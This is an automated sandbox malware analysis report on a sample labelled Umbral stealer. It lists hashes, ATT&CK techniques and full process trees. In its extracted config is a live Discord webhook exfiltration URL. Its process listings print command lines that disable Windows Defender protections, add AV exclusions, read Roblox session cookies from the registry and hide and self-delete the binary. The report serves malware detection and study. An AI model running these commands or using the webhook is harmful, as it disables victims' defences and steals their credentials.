umbral | 2761a5557845a1135de74de2cdb687900d3bd244d9d1966dd195cbfba61be36b

Analysis

max time kernel
100s
max time network
101s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
05-01-2025 16:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

blasted.zip
Size

90KB
MD5

c0c1f4d447518ec3466b3196a6bc8bca
SHA1

9cf2ec0c7bfb0ba18e85fe5c79d61165cb14dbbe
SHA256

2761a5557845a1135de74de2cdb687900d3bd244d9d1966dd195cbfba61be36b
SHA512

27fa369739f241bdfe06331dad818b23685c5c0cd0d2f76498706809685e28f60ad51ae310da768dda20bfece81da1a2dca964fcd4ac289f61872b5c0a9a0443
SSDEEP

1536:a7k84F02OAAVLwSnX6BkLWU+tgX0I6BZftKXPfK1wg6/9MJAfbOYa1FSsediF:/3tqLL647kBJAXa1wg6/HbOYKekF

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1318597375148687402/hi7z2fLgO4RRvXrp-fdHKsRpZGU-JbAhrm4wxVPBT5TIEA3KCmg8Y6RBurUI3jSJhEQ5

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002ab57-3.dat	family_umbral
behavioral1/memory/2724-5-0x00000232F0B20000-0x00000232F0B60000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 28 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5500	powershell.exe
4196	powershell.exe
1376	powershell.exe
4864	powershell.exe
1588	powershell.exe
5040	powershell.exe
1296	powershell.exe
5432	powershell.exe
5980	powershell.exe
4944	powershell.exe
5896	powershell.exe
2768	powershell.exe
1372	powershell.exe
5608	powershell.exe
5800	powershell.exe
3892	powershell.exe
3380	powershell.exe
2436	powershell.exe
4980	powershell.exe
5784	powershell.exe
5476	powershell.exe
2456	powershell.exe
1868	powershell.exe
1520	powershell.exe
4776	powershell.exe
5940	powershell.exe
2860	powershell.exe
5620	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2724	blasted.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
28	discord.com
32	discord.com
52	discord.com
65	discord.com
71	discord.com
1	discord.com
5	discord.com
24	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
60	ip-api.com
1	ip-api.com
38	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 14 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3024	cmd.exe
5996	cmd.exe
1332	PING.EXE
4024	PING.EXE
5184	cmd.exe
5244	PING.EXE
4496	cmd.exe
2508	cmd.exe
4868	PING.EXE
1292	PING.EXE
380	cmd.exe
4196	PING.EXE
660	cmd.exe
1540	PING.EXE

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 7 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1488	wmic.exe
452	wmic.exe
5716	wmic.exe
1504	wmic.exe
2248	wmic.exe
5716	wmic.exe
3580	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133805671845840977"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery

T1018

pid	Process
4024	PING.EXE
4196	PING.EXE
1332	PING.EXE
5244	PING.EXE
1540	PING.EXE
4868	PING.EXE
1292	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2724	blasted.exe
1520	powershell.exe
1520	powershell.exe
3892	powershell.exe
3892	powershell.exe
5500	powershell.exe
5500	powershell.exe
2796	powershell.exe
2796	powershell.exe
5980	powershell.exe
5980	powershell.exe
3424	blasted.exe
4776	powershell.exe
4776	powershell.exe
4196	powershell.exe
4196	powershell.exe
3380	powershell.exe
3380	powershell.exe
2540	powershell.exe
2540	powershell.exe
2436	powershell.exe
2436	powershell.exe
1308	blasted.exe
5940	powershell.exe
5940	powershell.exe
1372	powershell.exe
1372	powershell.exe
1376	powershell.exe
1376	powershell.exe
5604	powershell.exe
5604	powershell.exe
5608	powershell.exe
5608	powershell.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
3264	blasted.exe
2860	powershell.exe
2860	powershell.exe
4980	powershell.exe
4980	powershell.exe
4864	powershell.exe
4864	powershell.exe
3580	powershell.exe
3580	powershell.exe
5784	powershell.exe
5784	powershell.exe
3952	chrome.exe
3952	chrome.exe
4680	blasted.exe
4680	blasted.exe
5620	powershell.exe
5620	powershell.exe
5620	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
1588	powershell.exe
1588	powershell.exe
1588	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5276	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5276	7zFM.exe
Token: 35	5276	7zFM.exe
Token: SeSecurityPrivilege	5276	7zFM.exe
Token: SeDebugPrivilege	2724	blasted.exe
Token: SeIncreaseQuotaPrivilege	5732	wmic.exe
Token: SeSecurityPrivilege	5732	wmic.exe
Token: SeTakeOwnershipPrivilege	5732	wmic.exe
Token: SeLoadDriverPrivilege	5732	wmic.exe
Token: SeSystemProfilePrivilege	5732	wmic.exe
Token: SeSystemtimePrivilege	5732	wmic.exe
Token: SeProfSingleProcessPrivilege	5732	wmic.exe
Token: SeIncBasePriorityPrivilege	5732	wmic.exe
Token: SeCreatePagefilePrivilege	5732	wmic.exe
Token: SeBackupPrivilege	5732	wmic.exe
Token: SeRestorePrivilege	5732	wmic.exe
Token: SeShutdownPrivilege	5732	wmic.exe
Token: SeDebugPrivilege	5732	wmic.exe
Token: SeSystemEnvironmentPrivilege	5732	wmic.exe
Token: SeRemoteShutdownPrivilege	5732	wmic.exe
Token: SeUndockPrivilege	5732	wmic.exe
Token: SeManageVolumePrivilege	5732	wmic.exe
Token: 33	5732	wmic.exe
Token: 34	5732	wmic.exe
Token: 35	5732	wmic.exe
Token: 36	5732	wmic.exe
Token: SeIncreaseQuotaPrivilege	5732	wmic.exe
Token: SeSecurityPrivilege	5732	wmic.exe
Token: SeTakeOwnershipPrivilege	5732	wmic.exe
Token: SeLoadDriverPrivilege	5732	wmic.exe
Token: SeSystemProfilePrivilege	5732	wmic.exe
Token: SeSystemtimePrivilege	5732	wmic.exe
Token: SeProfSingleProcessPrivilege	5732	wmic.exe
Token: SeIncBasePriorityPrivilege	5732	wmic.exe
Token: SeCreatePagefilePrivilege	5732	wmic.exe
Token: SeBackupPrivilege	5732	wmic.exe
Token: SeRestorePrivilege	5732	wmic.exe
Token: SeShutdownPrivilege	5732	wmic.exe
Token: SeDebugPrivilege	5732	wmic.exe
Token: SeSystemEnvironmentPrivilege	5732	wmic.exe
Token: SeRemoteShutdownPrivilege	5732	wmic.exe
Token: SeUndockPrivilege	5732	wmic.exe
Token: SeManageVolumePrivilege	5732	wmic.exe
Token: 33	5732	wmic.exe
Token: 34	5732	wmic.exe
Token: 35	5732	wmic.exe
Token: 36	5732	wmic.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	5500	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeIncreaseQuotaPrivilege	5492	wmic.exe
Token: SeSecurityPrivilege	5492	wmic.exe
Token: SeTakeOwnershipPrivilege	5492	wmic.exe
Token: SeLoadDriverPrivilege	5492	wmic.exe
Token: SeSystemProfilePrivilege	5492	wmic.exe
Token: SeSystemtimePrivilege	5492	wmic.exe
Token: SeProfSingleProcessPrivilege	5492	wmic.exe
Token: SeIncBasePriorityPrivilege	5492	wmic.exe
Token: SeCreatePagefilePrivilege	5492	wmic.exe
Token: SeBackupPrivilege	5492	wmic.exe
Token: SeRestorePrivilege	5492	wmic.exe
Token: SeShutdownPrivilege	5492	wmic.exe
Token: SeDebugPrivilege	5492	wmic.exe
Token: SeSystemEnvironmentPrivilege	5492	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5276	7zFM.exe
5276	7zFM.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe

Suspicious use of SendNotifyMessage 52 IoCs

pid	Process
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
2932	taskmgr.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
3952	chrome.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe
4548	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 5732	2724	blasted.exe	81
PID 2724 wrote to memory of 5732	2724	blasted.exe	81
PID 2724 wrote to memory of 2288	2724	blasted.exe	84
PID 2724 wrote to memory of 2288	2724	blasted.exe	84
PID 2724 wrote to memory of 1520	2724	blasted.exe	86
PID 2724 wrote to memory of 1520	2724	blasted.exe	86
PID 2724 wrote to memory of 3892	2724	blasted.exe	88
PID 2724 wrote to memory of 3892	2724	blasted.exe	88
PID 2724 wrote to memory of 5500	2724	blasted.exe	90
PID 2724 wrote to memory of 5500	2724	blasted.exe	90
PID 2724 wrote to memory of 2796	2724	blasted.exe	92
PID 2724 wrote to memory of 2796	2724	blasted.exe	92
PID 2724 wrote to memory of 5492	2724	blasted.exe	94
PID 2724 wrote to memory of 5492	2724	blasted.exe	94
PID 2724 wrote to memory of 3912	2724	blasted.exe	96
PID 2724 wrote to memory of 3912	2724	blasted.exe	96
PID 2724 wrote to memory of 5516	2724	blasted.exe	98
PID 2724 wrote to memory of 5516	2724	blasted.exe	98
PID 2724 wrote to memory of 5980	2724	blasted.exe	100
PID 2724 wrote to memory of 5980	2724	blasted.exe	100
PID 2724 wrote to memory of 5716	2724	blasted.exe	102
PID 2724 wrote to memory of 5716	2724	blasted.exe	102
PID 2724 wrote to memory of 3024	2724	blasted.exe	104
PID 2724 wrote to memory of 3024	2724	blasted.exe	104
PID 3024 wrote to memory of 1292	3024	cmd.exe	106
PID 3024 wrote to memory of 1292	3024	cmd.exe	106
PID 3424 wrote to memory of 5232	3424	blasted.exe	112
PID 3424 wrote to memory of 5232	3424	blasted.exe	112
PID 3424 wrote to memory of 6132	3424	blasted.exe	114
PID 3424 wrote to memory of 6132	3424	blasted.exe	114
PID 3424 wrote to memory of 4776	3424	blasted.exe	116
PID 3424 wrote to memory of 4776	3424	blasted.exe	116
PID 3424 wrote to memory of 4196	3424	blasted.exe	118
PID 3424 wrote to memory of 4196	3424	blasted.exe	118
PID 3424 wrote to memory of 3380	3424	blasted.exe	120
PID 3424 wrote to memory of 3380	3424	blasted.exe	120
PID 3424 wrote to memory of 2540	3424	blasted.exe	122
PID 3424 wrote to memory of 2540	3424	blasted.exe	122
PID 3424 wrote to memory of 4428	3424	blasted.exe	124
PID 3424 wrote to memory of 4428	3424	blasted.exe	124
PID 3424 wrote to memory of 2616	3424	blasted.exe	126
PID 3424 wrote to memory of 2616	3424	blasted.exe	126
PID 3424 wrote to memory of 2384	3424	blasted.exe	128
PID 3424 wrote to memory of 2384	3424	blasted.exe	128
PID 3424 wrote to memory of 2436	3424	blasted.exe	130
PID 3424 wrote to memory of 2436	3424	blasted.exe	130
PID 3424 wrote to memory of 3580	3424	blasted.exe	132
PID 3424 wrote to memory of 3580	3424	blasted.exe	132
PID 3424 wrote to memory of 380	3424	blasted.exe	134
PID 3424 wrote to memory of 380	3424	blasted.exe	134
PID 380 wrote to memory of 4024	380	cmd.exe	136
PID 380 wrote to memory of 4024	380	cmd.exe	136
PID 1308 wrote to memory of 5668	1308	blasted.exe	138
PID 1308 wrote to memory of 5668	1308	blasted.exe	138
PID 1308 wrote to memory of 1996	1308	blasted.exe	140
PID 1308 wrote to memory of 1996	1308	blasted.exe	140
PID 1308 wrote to memory of 5940	1308	blasted.exe	142
PID 1308 wrote to memory of 5940	1308	blasted.exe	142
PID 1308 wrote to memory of 1372	1308	blasted.exe	144
PID 1308 wrote to memory of 1372	1308	blasted.exe	144
PID 1308 wrote to memory of 1376	1308	blasted.exe	146
PID 1308 wrote to memory of 1376	1308	blasted.exe	146
PID 1308 wrote to memory of 5604	1308	blasted.exe	148
PID 1308 wrote to memory of 5604	1308	blasted.exe	148

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4276	attrib.exe
2616	attrib.exe
452	attrib.exe
1500	attrib.exe
2288	attrib.exe
6132	attrib.exe
1996	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\blasted.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5276

C:\Users\Admin\Desktop\blasted.exe
"C:\Users\Admin\Desktop\blasted.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5732
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Desktop\blasted.exe"
  2⤵
  - Views/modifies file attributes
  PID:2288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\blasted.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5492
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:3912
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5980
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5716
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\blasted.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1292

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3720

C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3424
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5232
- C:\Windows\system32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
  2⤵
  - Views/modifies file attributes
  PID:6132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2540
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:4428
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:2616
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2436
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:3580
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:380
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4024

C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1308
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5668
- C:\Windows\system32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
  2⤵
  - Views/modifies file attributes
  PID:1996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5604
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:2096
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:6076
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5608
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1488
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5996
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4196

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2932

C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_blasted.zip\blasted.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3264
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4336
- C:\Windows\system32\attrib.exe
